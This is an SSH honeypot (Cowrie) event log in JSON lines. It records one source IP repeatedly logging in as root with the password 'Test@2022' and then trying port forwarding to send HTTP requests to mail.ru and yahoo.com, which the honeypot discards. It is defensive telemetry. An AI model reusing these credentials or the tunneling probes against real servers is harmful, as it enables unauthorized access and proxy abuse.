{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.227242Z","src_ip":"77.83.207.83","session":"eb7a7ed6f736"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.278414Z","src_ip":"77.83.207.83","session":"eb7a7ed6f736"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":22723,"dst_ip":"1.2.3.4","dst_port":22,"session":"83192580a0d1","protocol":"ssh","message":"New connection: 77.83.207.83:22723 (1.2.3.4:22) [session: 83192580a0d1]","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.326457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.327332Z","src_ip":"77.83.207.83","session":"83192580a0d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.376792Z","src_ip":"77.83.207.83","session":"83192580a0d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.623384Z","src_ip":"77.83.207.83","session":"83192580a0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15271,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15271","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.673889Z","session":"83192580a0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.723411Z","src_ip":"77.83.207.83","session":"83192580a0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11402,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11402","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.863853Z","session":"83192580a0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.913430Z","src_ip":"77.83.207.83","session":"83192580a0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":27169,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27169","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.055910Z","session":"83192580a0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.105458Z","src_ip":"77.83.207.83","session":"83192580a0d1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.155988Z","src_ip":"77.83.207.83","session":"83192580a0d1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":22876,"dst_ip":"1.2.3.4","dst_port":22,"session":"3df6dad82059","protocol":"ssh","message":"New connection: 77.83.207.83:22876 (1.2.3.4:22) [session: 3df6dad82059]","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.205752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.206678Z","src_ip":"77.83.207.83","session":"3df6dad82059"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.256845Z","src_ip":"77.83.207.83","session":"3df6dad82059"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.507457Z","src_ip":"77.83.207.83","session":"3df6dad82059"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6019,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6019","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.558895Z","session":"3df6dad82059"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.609219Z","src_ip":"77.83.207.83","session":"3df6dad82059"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":24583,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24583","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.752613Z","session":"3df6dad82059"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.802890Z","src_ip":"77.83.207.83","session":"3df6dad82059"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":22018,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22018","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.944709Z","session":"3df6dad82059"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:20.995088Z","src_ip":"77.83.207.83","session":"3df6dad82059"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.046320Z","src_ip":"77.83.207.83","session":"3df6dad82059"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23013,"dst_ip":"1.2.3.4","dst_port":22,"session":"efe31a7b0387","protocol":"ssh","message":"New connection: 77.83.207.83:23013 (1.2.3.4:22) [session: efe31a7b0387]","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.094502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.095183Z","src_ip":"77.83.207.83","session":"efe31a7b0387"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.145030Z","src_ip":"77.83.207.83","session":"efe31a7b0387"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.392727Z","src_ip":"77.83.207.83","session":"efe31a7b0387"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11311,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11311","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.443516Z","session":"efe31a7b0387"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.493237Z","src_ip":"77.83.207.83","session":"efe31a7b0387"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":18342,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18342","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.635997Z","session":"efe31a7b0387"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.685704Z","src_ip":"77.83.207.83","session":"efe31a7b0387"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":22103,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:22103","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.828139Z","session":"efe31a7b0387"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.878265Z","src_ip":"77.83.207.83","session":"efe31a7b0387"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.929232Z","src_ip":"77.83.207.83","session":"efe31a7b0387"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23164,"dst_ip":"1.2.3.4","dst_port":22,"session":"edb44e4ca32a","protocol":"ssh","message":"New connection: 77.83.207.83:23164 (1.2.3.4:22) [session: edb44e4ca32a]","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.979895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:21.990979Z","src_ip":"77.83.207.83","session":"edb44e4ca32a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.031583Z","src_ip":"77.83.207.83","session":"edb44e4ca32a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.287483Z","src_ip":"77.83.207.83","session":"edb44e4ca32a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13902,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13902","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.339962Z","session":"edb44e4ca32a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.391412Z","src_ip":"77.83.207.83","session":"edb44e4ca32a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":7262,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7262","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.537620Z","session":"edb44e4ca32a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.589044Z","src_ip":"77.83.207.83","session":"edb44e4ca32a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":7396,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7396","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.733622Z","session":"edb44e4ca32a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.785063Z","src_ip":"77.83.207.83","session":"edb44e4ca32a"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.837337Z","src_ip":"77.83.207.83","session":"edb44e4ca32a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23301,"dst_ip":"1.2.3.4","dst_port":22,"session":"09b1a15e988b","protocol":"ssh","message":"New connection: 77.83.207.83:23301 (1.2.3.4:22) [session: 09b1a15e988b]","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.885991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.887576Z","src_ip":"77.83.207.83","session":"09b1a15e988b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:22.937655Z","src_ip":"77.83.207.83","session":"09b1a15e988b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.186439Z","src_ip":"77.83.207.83","session":"09b1a15e988b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4020,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4020","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.237272Z","session":"09b1a15e988b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.287142Z","src_ip":"77.83.207.83","session":"09b1a15e988b"}
